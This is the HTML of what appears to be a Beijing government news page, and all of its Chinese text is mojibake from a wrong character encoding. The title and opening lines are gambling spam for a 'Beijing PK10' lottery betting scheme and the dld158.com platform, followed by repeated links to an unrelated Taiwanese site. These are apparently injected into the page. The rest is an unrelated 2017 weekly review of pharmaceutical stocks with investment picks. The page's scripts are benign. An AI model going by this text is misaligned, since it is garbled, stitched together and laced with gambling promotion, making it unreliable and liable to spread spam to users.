.navbar .nav li a { font-family:"Microsoft YaHei";}
#div_zhengwen { font-family:"SimSun";}
#div_zhengwen p{ font-family:"SimSun"; padding:0;}
select { width:75px; float:left; height:35px;}
.search .input{ border:1px solid #c1c1c1; width:290px;}
.bdsharebuttonbox { float:left; width:80%;}
.navbar .nav li a { padding: 10px 48px 11px 49px;}
.nav_weather span { float:right;}
#footer { position:absolute; left:0; right:0; margin:20px 0 0 0;}
#essaybottom {font-family:"simsun"; }
#pic { text-align:center; }
#pic ul { padding-top:10px; display:none; }
#pic li {font-family:"SimSun";}
.content_text h1 {line-height:150%;}
.version { float:right; padding:48px 50px 0 0}
.search { padding: 50px 0 0 70px;}
.nav_weather a { font-family:simsun;}
.version li a { font-family:simsun;}
.footer-class { font-family:simsun;}
@media only screen and (max-width: 480px)
{
#pic img { width:100%;}
}
@media only screen and (max-width: 320px)
{
#pic img { width:100%;}
}
@media only screen and (max-width: 640px)
{
#pic img { width:100%;}
}
#filerider .filelink {font-family:"SimSun";}
#filerider .filelink a:link { color:#0000ff; font-family:"SimSun";}
</style>
<scRipt type="text/javascRipt">
var pageName = "t1424135";
var pageExt = "htm";
var pageIndex = 0 + 1;
var pageCount = 1;
function getCurrentPage() {
document.write(pageIndex);
}
function generatePageList() {
for (i=0;i<1;i++) {
var curPage = i+1;
document.write('<option value=' + curPage);
if (curPage == pageIndex)
document.write(' selected');
document.write('>' + curPage + '</option>');
}
}
function preVious(n) {
if (pageIndex == 1) {
alert('ÒѾÊÇÊ×Ò³£¡');
} else {
getPageLocation(pageIndex-1);
}
}
function next(n) {
if (pageIndex == pageCount) {
alert('ÒѾÊÇβҳ£¡');
} else {
nextPage(pageIndex);
}
}
function nextPage(page) {
var gotoPage = "";
if (page == 0) {
gotoPage = pageName + "." + pageExt;
} else {
gotoPage = pageName + "_" + page + "." + pageExt;
}
location.href = gotoPage;
}
function getPageLocation(page) {
var gotoPage = "";
var tpage;
if (page == 1) {
gotoPage = pageName + "." + pageExt;
} else {
tpage=page-1;
gotoPage = pageName + "_" + tpage + "." + pageExt;
}
location.href = gotoPage;
}
</scRipt>
<SCRIPT type=text/javascRipt>
function $(xixi) {
return document.getElementById(xixi);
}
//ת»»×ÖºÅ
function doZoom(size){
if(size==12){
$("contentText").style.fontSize = size + "px";
$("fs12").style.display = "";
$("fs14").style.display = "none";
$("fs16").style.display = "none";
}
if(size==14){
$("contentText").style.fontSize = size + "px";
$("fs12").style.display = "none";
$("fs14").style.display = "";
$("fs16").style.display = "none";
}
if(size==16){
$("contentText").style.fontSize = size + "px";
$("fs12").style.display = "none";
$("fs14").style.display = "none";
$("fs16").style.display = "";
}
}
</SCRIPT>
<!-- Le HTML5 shim, for IE6-8 support of HTML5 elements -->
<!--[if lt IE 9]>
<scRipt src="//html5shim.googlecode.com/svn/trunk/html5.js"></scRipt>
<![endif]-->
<!-- Le fav and touch icons -->
<link rel="shortcut icon" href="images/favicon.ico">
<link rel="apple-touch-icon" href="images/apple-touch-icon.png">
<link rel="apple-touch-icon" sizes="72x72" href="images/apple-touch-icon-72x72.png">
<link rel="apple-touch-icon" sizes="114x114" href="images/apple-touch-icon-114x114.png">
<scRipt type="text/javascRipt">
window.onload = function(){
var picurl = [
"",
"",
"",
"",
"",
"",
"",
"",
"",
""
];
var i=0;
for(i=0;i<picurl.length;i++)
{
picurl[i].index=i;
if(picurl[i]!="")
{
document.getElementById("pic_"+i).style.display = "block";
}
}
}
</scRipt>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="nav_weather">
<div class="container"><a href="http://zhengwu.beijing.gov.cn/sld/swld/swsj/t1232150.htm" title="ÊÐί" target="_blank">ÊÐί</a> | <a href="http://www.bjrd.gov.cn/" title="ÊÐÈË´ó" target="_blank">ÊÐÈË´ó</a> | <a href="http://www.beijing.gov.cn/" title="ÊÐÕþ¸®" target="_blank">ÊÐÕþ¸®</a> | <a href="http://www.bjzx.gov.cn/" title="ÊÐÕþÐ" target="_blank">ÊÐÕþÐ</a></div>
</div>
<div class="container">
<a class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</a>
<div class="span12">
<a class="brand" href="http://www.beijing.gov.cn/"><img src="http://www.beijing.gov.cn/images/zhuanti/xysym/logo.png" /></a>
<div class="search">
<scRipt language="JavaScript" type="text/javascRipt">
function checkForm(){
var temp = searchForm.temp.value;
var database = searchForm.database.value;
if(temp==null || temp==""){
alert("ÇëÊäÈëËÑË÷Ìõ¼þ");
}
else{
var url="http://so.beijing.gov.cn/Query?qt="+encodeURIComponent(temp)+"&database="+encodeURIComponent(database);
window.open(url);
}
return false;
}
</scRipt>
<form id="search" method="get" name="searchForm" action="" target="_blank" onSubmit="return checkForm()">
<input type="hidden" value="bj" id="database" name="database" />
<input name="temp" id="keyword" type="text" value="È«ÎÄËÑË÷" class="input" title="È«ÎÄËÑË÷¹Ø¼ü×Ö" />
<input id="searchbutton" type="image" src="http://www.beijing.gov.cn/images/zhuanti/xysym/search_btn.gif" width="66" height="35" title="µã»÷ËÑË÷" alt="ËÑË÷" />
</form>
</div>
<div class="version"><ul>
<li><a title="ÎÞÕϰ" href="http://wza.beijing.gov.cn/" target="_blank" id="yx_style_nav">ÎÞÕϰ</a></li>
<li><a target="_blank" title="·±Ìå°æ" href="http://210.75.193.158/gate/big5/www.beijing.gov.cn">·±Ìå</a></li>
<li><a target="_blank" title="¼òÌå°æ" href="http://www.beijing.gov.cn">¼òÌå</a></li>
<li class="last"><a target="_blank" title="English Version" href="http://www.ebeijing.gov.cn">English</a></li></ul><ul>
<li><a href="javascRipt:void(0)" onclick="SetHome(this,window.location)" title="ÉèΪÊ×Ò³">ÉèΪÊ×Ò³</a></li>
<li><a title="¼ÓÈëÊÕ²Ø" href="javascRipt:void(0)" onclick="shoucang(document.title,window.location)">¼ÓÈëÊÕ²Ø</a></li>
<li class="last"><a target="_blank" title="ÒÆ¶¯°æ" href="http://www.beijing.gov.cn/sjbsy/">ÒÆ¶¯°æ</a></li></ul></div>
</div>
</div>
<div class="nav-collapse">
<div class="container">
<ul class="nav">
<li ><a href="http://www.beijing.gov.cn/" class="normal" title="Ê×Ò³">Ê×Ò³</a></li>
<li><a href="http://zhengwu.beijing.gov.cn/" class="normal" title="ÕþÎñÐÅÏ¢">ÕþÎñÐÅÏ¢</a></li>
<li><a href="http://www.beijing.gov.cn/sqmy/default.htm" class="normal" title="ÉçÇéÃñÒâ">ÉçÇéÃñÒâ</a></li>
<li><a href="http://banshi.beijing.gov.cn" class="normal" title="ÕþÎñ·þÎñ">ÕþÎñ·þÎñ</a></li>
<li><a href="http://www.beijing.gov.cn/bmfw" class="normal" title="±ãÃñ·þÎñ">±ãÃñ·þÎñ</a></li>
<li style="background:none;"><a href="http://www.beijing.gov.cn/rwbj/default.htm" class="normal" title="ÈËÎı±¾©">ÈËÎı±¾©</a></li>
</ul>
</div>
</div><!--/.nav-collapse -->
</div>
</div>
</div>
<div class="container" style="background:#fff; margin-top:24px;">
<div class="content_text">
<div id="breadcrumbnav">
<ul>
<li>Ê×Ò³¡¡>¡¡±ãÃñ·þÎñ¡¡>¡¡×îÐÂÌáʾ</li>
</ul>
<div class="clearboth"></div>
</div>
<h1>±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®
<div id="othermessage">
<p>
<span>À´Ô´£º±±¾©ÈÕ±¨</span>
<span>ÈÕÆÚ£º2017-04-21 15:23:18</span></p>
<dl>
<scRipt language='JavaScript' type="text/javascRipt">
function changeSize(size){document.getElementById('div_zhengwen').style.fontSize=size+'px'}</scRipt>
¡¾×ֺŠ<a href='javascRipt:changeSize(18)' style="font-size:16px;">´ó</a> <a href='javascRipt:changeSize(14)' style="font-size:14px;">ÖÐ</a> <a href='javascRipt:changeSize(12)' style="font-size:12px;">С</a>¡¿</dl>
</div>
</h1>
<div id="div_zhengwen">
<div id="pic">
<ul id="pic_0">
<li><img src="" border="0" alt="" title="" /></li>
<li></li>
</ul>
<ul id="pic_1">
<li><img src="" border="0" alt="" title="" /></li>
<li></li>
</ul>
<ul id="pic_2">
<li><img src="" border="0" alt="" title="" /></li>
<li></li>
</ul>
<ul id="pic_3">
<li><img src="" border="0" alt="" title="" /></li>
<li></li>
</ul>
<ul id="pic_4">
<li><img src="" border="0" alt="" title="" /></li>
<li></li>
</ul>
<ul id="pic_5">
<li><img src="" border="0" alt="" title="" /></li>
<li></li>
</ul>
<ul id="pic_6">
<li><img src="" border="0" alt="" title="" /></li>
<li></li>
</ul>
<ul id="pic_7">
<li><img src="" border="0" alt="" title="" /></li>
<li></li>
</ul>
<ul id="pic_8">
<li><img src="" border="0" alt="" title="" /></li>
<li></li>
</ul>
<ul id="pic_9">
<li><img src="" border="0" alt="" title="" /></li>
<li></li>
</ul>
</div>
<div class=TRS_Editor><p align="justify">¡¡¡¡±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»® »¶Ó´ó¼ÒÀ´µ½dld158.comÓéÀÖÆ½Ì¨</p>
<img src="{img}" width="300" height="330"/>
<p align="justify">¡¡¡¡<a href="http://sapience.com.tw/logs/meng/q380935.html">±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®</a></p>±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®
<p align="justify">¡¡¡¡<a href="http://sapience.com.tw/logs/meng/q986848.html">±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®</a></p>±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®
<p align="justify">¡¡¡¡<a href="http://sapience.com.tw/logs/meng/q583672.html">±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®</a></p>±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®
<p align="justify">¡¡¡¡<a href="http://sapience.com.tw/logs/meng/q189496.html">±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®</a></p>±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®
<p align="justify">¡¡¡¡<a href="http://sapience.com.tw/logs/meng/q787320.html">±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®</a></p>±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®
<p align="justify">¡¡¡¡
<p>¡¡¡¡<strong>Ͷ×ÊÒªµã</strong></p>
<p>¡¡¡¡<strong><span>ÐÂÔö¹ÒÅÆ¡£</span></strong><strong><span></span></strong><strong><span></span></strong><strong><span></span></strong><strong><span></span></strong><strong><span>ÉÏÖÜÐÂÔö¹ÒÅÆÒ½Ò©ÆóÒµ1¼Ò¡£</span></strong><span>½ØÖÁ2017Äê4ÔÂ8ÈÕ£¬ÐÂÈý°å¹ÒÅÆÒ½Ò©¹«Ë¾¹²ÓÐ655¼Ò£¬ÐÂÔö¹ÒÅÆÒ½Ò©ÆóÒµÁú·¢ÖÆÒ©ÊôÓÚÒ©Æ·¾ÏúÆóÒµ¡£¸ù¾Ý2015Ä걨Êý¾Ý£¬Áú·¢ÖÆÒ©ÓªÒµÊÕÈëΪ4853.41ÍòÔª£¬Í¬±ÈÔö³¤1.92%£¬¾»ÀûÈóΪ-120.4ÍòÔª¡£</span><span></span><span></span><span></span></p>
<p>¡¡¡¡<span><strong>A¹ÉÊг¡¡£</strong>ÉÏÖÜA¹ÉÊг¡Ò½Ò©°å¿éС·ùÉÏÕÇ¡£ÉêÍòÒ½Ò©ÐÐÒµÖ¸ÊýÉÏÕÇ1.05%£¬ÅÜÊ仦Éî300Ö¸Êý0.73pcts£¬239¼Ò¹«Ë¾Öй²174¼Ò¹«Ë¾ÉÏÕÇ£¬ÆäÖи¨ÈÊÒ©Òµ¡¢Íò¶«Ò½ÁÆ¡¢²©êÍ´´ÐÂÕÇ·ù¾Óǰ£¬·Ö±ðÉÏÕÇ9.91%/8.11%/7.59%¡£¹²56¼Ò¹«Ë¾Ïµø£¬ÆäÖÐлªÒ½ÁÆ¡¢Â¤ÉñÈÖ·¢¡¢¾«»ªÖÆÒ©µø·ù¾Óǰ,·Ö±ðϵø7.29%/5.79%/4.5%¡£¸ù¾ÝÉêÍòÒ½Ò©Ò»¼¶ÐÐÒµÖ¸Êý£¬Ò½Ò©°å¿é´¦ÓÚ¸÷ϸ·Ö×ÓÐÐÒµÏÂÓÎˮƽ£¬Î»ÓÚ28¸öÒ»¼¶×ÓÐÐÒµÖеÚ22λ¡£</span></p>
<p>¡¡¡¡<strong><span>¸Û¹ÉÊг¡¡£</span></strong><span>ÉÏÖܺãÉúÖ¸ÊýÊÕÓÚ24267.3µã£¬Ïµø0.14%¡£¸Û¹ÉÒ½Ò©°å¿é¹É·ÝÕÇ·ùǰÎåλ·Ö±ðÊÇÁªºÏÒ½Îñ£¨16.92 %£©¡¢¿µ³¼Ò©Òµ£¨15.78%£©¡¢ËÄ»·Ò½Ò©£¨7.8%£©¡¢ÖйúÒ½ÁƼ¯ÍÅ£¨7.33%£©¡¢¿µ»ªÒ½ÁÆ£¨6.9%£©£»ºóÎå·Ö±ðÊÇ׿çì¿Ø¹É£¨-17.35%£©¡¢»ªÏÄÒ½ÁÆ£¨-8.55%£©¡¢ÐÂÈñÒ½Ò©£¨-7.95%£©¡¢°ÙÐÅÒ©Òµ£¨-6.52%£©¡¢ºëºÍÈʰ®Ò½ÁÆ£¨-6.3%£©¡£</span></p>
<p>¡¡¡¡<strong><span>ÃÀ¹ÉÊг¡¡£</span></strong><span>ÉÏÖÜÃÀ¹úÖÐ×ʹÉ12¼ÒÒ½Ò©¹«Ë¾ÖÐÖйúÆê´øÑª¿âÁìÕÇ£¬ÕÇ·ùΪ9.61%£»³É½»·½Ã棬ÉÏÖÜÖиŹÉÒ½Ò©ÐÐÒµ³É½»×ÜÁ¿407.42Íò¹É£¬½ÏÉÏÉÏÖÜ442.57Íò¹ÉС·ùϽµ7.9%¡£ÆäÖÐÖйúÆê´øÑª¿â¡¢Ì©°îÉúÎï¡¢°Ù¼ÃÉñÖݽ»Í¶»îÔ¾£¬Öܳɽ»Á¿·Ö±ðΪÖܳɽ»Á¿£¨Íò¹É£©92.72/68.55/54.81Íò¹É¡£</span></p>
<p>¡¡¡¡<strong><span>Ò½Ò©ÐÐÒµÕþ²ßÒ»ÀÀ¡£</span></strong><strong><span></span></strong><strong><span></span></strong><strong><span></span></strong><strong><span></span></strong><strong><span>È«¹úÐÔÕþ²ß·½Ã棬</span></strong><span>CFDA</span><span>·¢²¼¡¶ÍøÂçÒ½ÁÆÆ÷е¾ÓªÎ¥·¨ÐÐΪ²é´¦°ì·¨(Õ÷ÇóÒâ¼û¸å)¡·£¬Ìá³ö´ÓÊÂÍøÂçÒ½ÁÆÆ÷е¾ÓªµÄÆóÒµºÍÍøÂçÒ½ÁÆÆ÷е½»Ò×·þÎñµÚÈý·½Æ½Ì¨Î´°´¹æ¶¨±¸°¸µÄ£¬ÓÉÉèÇøµÄÊм¶¼°ÒÔÉϵط½Ê³Æ·Ò©Æ·¼à¶½¹ÜÀí²¿ÃÅÔðÁî¸ÄÕý£¬²¢´¦5000ÔªÒÔÉÏ3ÍòÔªÒÔÏ·£¿î¡££¨ÐÅÏ¢À´Ô´£ºCFDA£©£»<strong>µØÇøÐÔÒ½ÁÆÊ¼þÖУ¬</strong>4ÔÂ8ÈÕÆð£¬±±¾©Êн«ÊµÊ©Ò½Ò©·Ö¿ª×ۺϸĸҩƷÑô¹â²É¹º×÷Ϊ¸Ä¸ï´ëʩ֮һ£¬½«ËæÖ®Í¬²½ÊµÊ©¡£ÔÚ±£Ö¤Ò©Æ·ÖÊÁ¿¡¢°²È«µÄǰÌáÏ£¬¶¯Ì¬Áª¶¯Í¬³§¼Ò¡¢Í¬Æ·¹æÒ©Æ·µÄÈ«¹úÊ¡¼¶Ò©Æ·¼¯Öвɹº×îµÍÖбê¼Û¸ñ£¬²¢ÔÚÑô¹â²É¹ºÆ½Ì¨ÓèÒÔ¹«Ê¾¡££¨ÐÅÏ¢À´Ô´£º±±¾©Íí±¨£©</span><span></span><span></span><span></span></p>
<p>¡¡¡¡<strong><span>¶¨ÏòÔö·¢¡£</span></strong><strong><span></span></strong><strong><span></span></strong><strong><span></span></strong><strong><span>ÉÏÖÜÐÂÈý°åÒ½Ò©ÐÐÒµÊг¡Êµ¼Êļ×Ê1.78ÒÚÔª£¬Ä¼×ʺóPE£¨TTM£©Îª24X¡£</span></strong><span>½üËÄÖÜÐÂÈý°åÒ½Ò©ÐÐÒµ¹²20¼Ò¹«Ë¾ÊµÊ©¶¨ÏòÔö·¢£¬Êµ¼Êļ×Ê×ܶî´ï14.34ÒÚÔª£¬½ÏÉÏÔÂͬÆÚ8.17ÒÚÔªÌá¸ß75.52%£¬½üËÄÖÜÆ½¾ùļ×ʺóPE£¨TTM£©Îª24X£¬2016ÄêÖÁ½ñÐÂÈý°å¹ÒÅÆÒ½Ò©Æóҵʵ¼Êļ×Ê×ܶî´ï127ÒÚÔª¡£</span><span></span><span></span></p>
<p>¡¡¡¡<strong><span>Á½´ó²ßÂÔ¾ò½ðйÒÅÆ¹«Ë¾¡£</span></strong><span>ÎÒÃǸù¾Ý²»Í¬Í¶×ÊÕߵį«ºÃ£¬¸ù¾Ý¶¨ÐÔ£¨²úҵ˼ά£©¡¢¹É¶«½á¹¹ÊáÀí³öÁ½´óͶ×ʲßÂÔ£¬×ܽá³ö·¢ÉúƵ´Î½Ï¸ßµÄÆóÒµ½øÈ뾫ѡ¹ÉƱ³Ø¡£<strong>1. ¸ß¾°ÆøÐÐÒµ£º</strong>ÒÔ²úҵ˼άѰÕҸ߾°ÆøÏ¸·ÖÐÐÒµ£¬Í¬Ê±¿¼ÂÇÐÐÒµµÄϡȱÐÔ£¬°üÀ¨Ò½ÁÆÆ÷еÖеÄÌåÍâÕï¶ÏÆóÒµ£¬ÉúÎïÖÆÒ©ÖеĿ¹ÌåÒ©ºÍ¸Éϸ°ûÆóÒµ£¬ÃñÓªÒ½ÁÆ·þÎñÆóÒµ¡£½¨Ò鹨עÌì½×ÉúÎï¡¢¼ªÂê»ùÒò¡¢Zãü¿Æ¼¼¡¢°Ù°Á¿Æ¼¼¡¢ÒæÉÆÉúÎï¡¢¿Æ¶÷¿ÚÇ»¡¢»ªº«ÕûÐΡ¢Á«³ØÒ½Ôº¡¢´ïÈðÉúÎï¡¢ÈüÀ³À¡¢¾ýʵÉúÎŵ˼À¼µÂ¡¢Àö¶¼ÕûÐΡ¢³É´óÉúÎï¡¢Á¢µÏÉúÎï¡¢ÈðÃÀÒ½ÁÆ¡¢ºç²©»ùÒò¡¢Ö¥ÓÑÒ½ÁÆ¡£<strong>2. Ç¿ÊÆ¹É¶«£º</strong>ÖÐÐÅÐÂÈý°åÒ½Ò©ÐÐÒµ¸²¸Ç¹ÉƱÖУ¬½¨Ò鹨עÌì½×ÉúÎï¡¢Zãü¿Æ¼¼¡¢°Ù°Á¿Æ¼¼¡¢ÒæÉÆÉúÎï¡¢ÌìÖǺ½¡¢¿Æ¶÷¿ÚÇ»¡¢»ªº«ÕûÐΡ¢Á«³ØÒ½Ôº¡¢´ïÈðÉúÎï¡¢ÈüÀ³À¡¢ÐÂÑ۹⡢¾ýʵÉúÎŵ˼À¼µÂ¡¢Àö¶¼ÕûÐΡ¢Á¢µÏÉúÎï¡¢ÉúÎï¹È¡¢ÈðÃÀÒ½ÁÆ¡¢°ÙÔ£ÖÆÒ©¡¢ºç²©»ùÒò¡¢Ö¥ÓÑÒ½ÁÆ¡£</span></p>
<p>¡¡¡¡<strong><span>·çÏÕÒòËØ¡£</span></strong><span>Ö÷°å/´´Òµ°å×¢²áÖÆÍÆ³öÇÒ²»ÏÞÁ÷£¬¾º¼ÛתÈúÍת°åÖÆ¶ÈÍÆ³öÂýÓÚÔ¤ÆÚ¡£</span></p>
<p>¡¡¡¡<strong><strong><strong>ÖÐÐÅ֤ȯÑо¿²¿ÐÂÈý°åÍŶÓÖØµã¸²¸Ç¹ÉƱ</strong></strong></strong></p>
<p>¡¡¡¡<strong><span>½Ø<strong>ÖÁ<strong><strong>2017Äê4ÔÂ8ÈÕ£¬ÖÐÐÅ֤ȯÑо¿²¿ÐÂÈý°åÍŶÓ×ܹ²Öص㸲¸ÇÒ½Ò©¹«Ë¾26¼Ò</strong></strong></strong>¡£</span></strong></p>
<p>¡¡¡¡<img src="http://img.mp.itc.cn/upload/20170410/c0b8bd40e7564812a1c9e4f3ed264521_th.jpeg" /></p>
<p>¡¡¡¡<strong><strong><strong>ÐÂÔö¹ÒÅÆ¹«Ë¾¼°Í¶×ʲßÂÔ</strong></strong></strong></p>
<p>¡¡¡¡<strong><strong><strong>¹ÒÅÆ¹«Ë¾¼ò½é</strong></strong></strong></p>
<p>¡¡¡¡<strong><span>ÉÏ</span></strong><strong><span>ÖÜÐÂÔö¹ÒÅÆÒ½Ò©ÆóÒµ1¼Ò¡£</span></strong><span>½ØÖÁ2017Äê4ÔÂ8ÈÕ£¬ÐÂÈý°å¹ÒÅÆÒ½Ò©¹«Ë¾¹²ÓÐ655¼Ò£¬ÐÂÔö¹ÒÅÆÒ½Ò©ÆóÒµ<span>Áú·¢ÖÆÒ©ÊôÓÚÒ©Æ·¾ÏúÆóÒµ¡£¸ù¾Ý2015Ä걨Êý¾Ý£¬Áú·¢ÖÆÒ©ÓªÒµÊÕÈëΪ4853.41ÍòÔª£¬Í¬±ÈÔö³¤1.92%£¬¾»ÀûÈóΪ-120.4ÍòÔª¡£</span></span></p>
<p>¡¡¡¡<img src="http://img.mp.itc.cn/upload/20170410/cfc091dfd18e4b32b6c00240169ec583.jpeg" /></p>
<p>¡¡¡¡<strong><strong><strong>¹ÒÅÆ¹«Ë¾Í¶×ʲßÂÔ</strong></strong></strong></p>
<p>¡¡¡¡<strong>Á½´ó²ßÂÔ¾ò½ðйÒÅÆ¹«Ë¾¡£</strong><span>ÎÒÃǸù¾Ý²»Í¬Í¶×ÊÕߵį«ºÃ£¬¸ù¾Ý¶¨ÐÔ£¨²úҵ˼ά£©¡¢¹É¶«½á¹¹ÊáÀí³öÁ½´óͶ×ʲßÂÔ£¬×ܽá³ö·¢ÉúƵ´Î½Ï¸ßµÄÆóÒµ½øÈ뾫ѡ¹ÉƱ³Ø¡£</span></p>
<p>¡¡¡¡<strong><span>1.</span></strong><strong><span>¸ß¾°ÆøÐÐÒµ£º</span></strong><span>ÒÔ²úҵ˼άѰÕҸ߾°ÆøÏ¸·ÖÐÐÒµ£¬Í¬Ê±¿¼ÂÇÐÐÒµµÄϡȱÐÔ£¬°üÀ¨Ò½ÁÆÆ÷еÖеÄÌåÍâÕï¶ÏÆóÒµ£¬ÉúÎïÖÆÒ©ÖеĿ¹ÌåÒ©ºÍ¸Éϸ°ûÆóÒµ£¬ÃñÓªÒ½ÁÆ·þÎñÆóÒµ¡£½¨Ò鹨עÌì½×ÉúÎï¡¢¼ªÂê»ùÒò¡¢Zãü¿Æ¼¼¡¢°Ù°Á¿Æ¼¼¡¢ÒæÉÆÉúÎï¡¢¿Æ¶÷¿ÚÇ»¡¢»ªº«ÕûÐΡ¢Á«³ØÒ½Ôº¡¢´ïÈðÉúÎï¡¢ÈüÀ³À¡¢¾ýʵÉúÎŵ˼À¼µÂ¡¢Àö¶¼ÕûÐΡ¢³É´óÉúÎï¡¢Á¢µÏÉúÎï¡¢ÈðÃÀÒ½ÁÆ¡¢ºç²©»ùÒò¡¢Ö¥ÓÑÒ½ÁÆ¡£</span></p>
<p>¡¡¡¡<strong><span>2. </span><span>Ç¿ÊÆ¹É¶«£º</span></strong><span>ÖÐÐÅÐÂÈý°åÒ½Ò©ÐÐÒµ¸²¸Ç¹ÉƱÖУ¬½¨Ò鹨עÌì½×ÉúÎï¡¢Zãü¿Æ¼¼¡¢°Ù°Á¿Æ¼¼¡¢ÒæÉÆÉúÎï¡¢ÌìÖǺ½¡¢¿Æ¶÷¿ÚÇ»¡¢»ªº«ÕûÐΡ¢Á«³ØÒ½Ôº¡¢´ïÈðÉúÎï¡¢ÈüÀ³À¡¢ÐÂÑ۹⡢¾ýʵÉúÎŵ˼À¼µÂ¡¢Àö¶¼ÕûÐΡ¢Á¢µÏÉúÎï¡¢ÉúÎï¹È¡¢ÈðÃÀÒ½ÁÆ¡¢°ÙÔ£ÖÆÒ©¡¢ºç²©»ùÒò¡¢Ö¥ÓÑÒ½ÁÆ¡£</span></p>
<p>¡¡¡¡<img src="http://img.mp.itc.cn/upload/20170410/32e5edb92dc5419881b668de85aad3fa_th.jpeg" /></p>
<p>¡¡¡¡<img src="http://img.mp.itc.cn/upload/20170410/431caf470c0f442dba0b80c3c49138a3_th.jpeg" /></p>
<p>¡¡¡¡<img src="http://img.mp.itc.cn/upload/20170410/f9866296102b41c49486341357a79340_th.jpeg" /></p>
<p>¡¡¡¡<img src="http://img.mp.itc.cn/upload/20170410/6a989ba231fe453cbfed642270364020_th.jpeg" /></p>
<p>¡¡¡¡<img src="http://img.mp.itc.cn/upload/20170410/3be405176cbc4d258d470cda45dc971c_th.jpeg" /></p>
<p>¡¡¡¡<strong>Ò½Ò©ÐÐÒµÊг¡»Ø¹Ë</strong></p>
<p>¡¡¡¡<strong><strong><strong>ÐÂÈý°åÒ½Ò©ÐÐÒµÊг¡½»Ò׻عË</strong></strong></strong></p>
<p>¡¡¡¡<strong><span>Êг¡»Ø¹Ë¡£</span></strong><span>½ØÖ¹ÖÁ2017Äê</span><span>4</span><span>ÔÂ8ÈÕ<span>£¬</span><span>ÐÂÈý°åÒ½Ò©°å¿é¹²ÓÐ655¼Ò¹«Ë¾¡£ÉÏÖÜ106¼Ò¹«Ë¾¹¹³ÉµÄ×öÊаå¿éÖÐÓÐ72¼Ò·¢Éú½»Ò×£¬³É½»×ܶî8581.98ÍòÔª£¬½ÏÉÏÉÏÖÜ2.09ÒÚÔªµÄˮƽϽµ58.94%£»ÐÒéתÈðå¿é¹²41¼Ò·¢Éú½»Ò×£¬³É½»×ܶî1.32ÒÚÔª£¬½ÏÉÏÉÏÖÜ4.06ÒÚÔªµÄˮƽϽµ67.49%¡£</span></span></p>
<p>¡¡¡¡<strong><span>£¨1£©×öÊÐתÈðå¿é£¬</span></strong><span>¹²ÓÐ35Ö»¹ÉƱÉÏÕÇ£¬ÕÇ·ù×î¸ßµÄάºÍÒ©Òµ¡¢ÀûÑóË®²ú¡¢Ì©¶÷¿µ·Ö±ðÉÏÕÇ11.81%/6.15%/5.90%¡£×öÊаå¿é³É½»¶î×î¸ßµÄǰÈýλ·Ö±ðΪ³É´óÉúÎï¡¢ÈÊ»áÉúÎάºÍÒ©Òµ£¬³É½»¶î·Ö±ðΪ1638.55/928.02/836.32ÍòÔª¡£</span></p>
<p>¡¡¡¡<strong><span>£¨2£©ÐÒéתÈðå¿é£¬</span></strong><span>ÉÏÖÜ</span><span>³É½»¶î×î¸ßµÄǰÈýλ·Ö±ðΪºëÌìÉúÎï¡¢¸ñÀ¼Äá¡¢ÈýÁ¦ÖÆÒ©£¬³É½»¶î·Ö±ðΪ4207.10/3659.05/1418.56ÍòÔª¡£</span></p>
<p>¡¡¡¡<img src="http://img.mp.itc.cn/upload/20170410/80af9a6d5ca047168fbdc7b4e0922b21_th.jpeg" /></p>
<p>¡¡¡¡<strong><span>ÐÂÈý°åÒ½Ò©ÐÐÒµ´´Ð²ã°å¿éºÍ»ù´¡²ã°å¿é»Ø¹Ë¡£</span></strong><strong><span></span></strong><strong><span>£¨1£©´´Ð²ã°å¿é£º</span></strong><span>¹²ÓÐ64¼Ò¹«Ë¾£¬ÉÏÖܹ²42¼Ò¹«Ë¾·¢Éú½»Ò×£¬³É½»×ܶî1.36ÒÚÔª£¬½ÏÉÏÉÏÖÜ4.75ÒÚԪϽµ71.34%¡£ºëÌìÉúÎサͶ»îÔ¾£¬³É½»¶î´ï4207.1ÍòÔª£»<strong>£¨2£©»ù´¡²ã°å¿é£º</strong>¹²ÓÐ589¼Ò¹«Ë¾£¬ÉÏÖܹ²71¼Ò¹«Ë¾·¢Éú½»Ò×£¬³É½»×ܶî8196.17ÍòÔª£¬½ÏÉÏÉÏÖÜ1.4ÒÚԪϽµ41.46%¡£ÆäÖиñÀ¼ÄύͶ»îÔ¾£¬³É½»¶îΪ3659.05ÍòÔª¡£</span><span><span></span></span><span></span></p>
<p>¡¡¡¡<img src="http://img.mp.itc.cn/upload/20170410/e20fc71d4b514e0caaf21168eccfaa14_th.jpeg" /></p>
<p>¡¡¡¡<strong><strong>ÐÂÈý°åÒ½Ò©ÐÐÒµÊг¡¹ÀÖµ·ÖÎö</strong></strong></p>
